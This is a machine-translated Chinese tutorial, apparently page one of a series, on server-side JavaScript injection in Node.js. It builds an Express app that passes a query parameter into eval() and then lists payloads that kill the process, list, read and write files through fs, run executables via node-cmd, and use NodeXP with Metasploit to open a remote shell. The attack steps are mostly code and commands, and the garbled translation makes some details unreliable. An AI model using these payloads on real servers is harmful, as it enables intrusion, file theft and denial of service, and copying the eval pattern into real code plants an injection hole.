SSJI-to Node. js vulnerability audit of the series a-vulnerability warning-the black bar safety net

ID MYHACK58:62201993583
Type myhack58
Reporter 佚名
Modified 2019-04-10T00:00:00


hello I was in control of the security laboratory of the Whispering Wind, the JavaScript in Node. js with the help of turned into a server-side scripting language, so since it is a service side scripting language, there may be some security issues. SSJI(server side JavaScript injection) is a relatively new attack techniques. An attacker can use JS function on the server to perform malicious JS code to get cmdshell it.

0x01 environment to build Tools: Node.js Nodexp Metasploit-frameword(MSF) Build: 先傻瓜式的安装Node.js 安装好后Node.js remember to re-install one of the express framework npm install express –save (a new version of the Node. js comes with the npm)

0x02 SSJI hazards If no input is detected, it may be vulnerable to attack, the attacker can use the JS function on the server to perform malicious JS code. You can use a function there? The Eval() the setTimeout() Setinterval() Funtion() For example: (Eval.js:) var express = require('express'); var app = express(); app. get('/', function(req, res) { var resp=eval(req. query. name); res. send('Response'+resp); }); app. listen(3002); console. log('Server running at'); When we use the Node. js to run this js when in the local open a 3002 port of the WEB service, and then he will get the GET way to pass parameters up to pass the parameter named name to the value, and then will get to the value in the eval()function execution. We went to visit this port ! Then we can for him to GET transmission parameters, such as name=console. log(“hello World”); ! Pass the Senate after it was clear the execution in the command line it is obvious the output of the Hello World! So since we can perform the output, is not able to perform other statement? For example, some of the malicious statement. process. exit() / process. kill(process. pid) Also you can kill he running process NodeJs) ! The process is terminated. Basically, an attacker can perform on the system/perform almost any operation in the user permissions within the limits we can also try to call the core module fs to read/list the current directory under the file name and folder name res. end(require('fs'). readdirSync('.'). toString()) ! We can also try to call the core module of the fs to write the file(although there is no Echo, but still successfully written) res. end(require('fs'). writeFileSync('message.txt','hello')) ! We can also try to call the core module of the fs to go read his file res. end(require('fs'). readFileSync('a. js','utf-8')) ! ! If the target machine is mounted above a node-cmd call cmd (display clear, I went to call an exe to install) var nodeCmd = require('node-cmd');nodeCmd. run('360cse_9.5.0.138.exe'); ! ! Obviously we will call the cmd

0x03 by nodexp get cmdshell We can also try to use NodeXP tool added MSF to successfully obtain a cmdshell Method of use: GET: python –url=http://localhost:3001/? name=[INJECT_HERE]POST: python –url=http://localhost:3001/post.js –pdata=username=[INJECT_HERE] ! ! ! Set up a attack server's IP(with MSF) ! Set the port !

[1] [2] next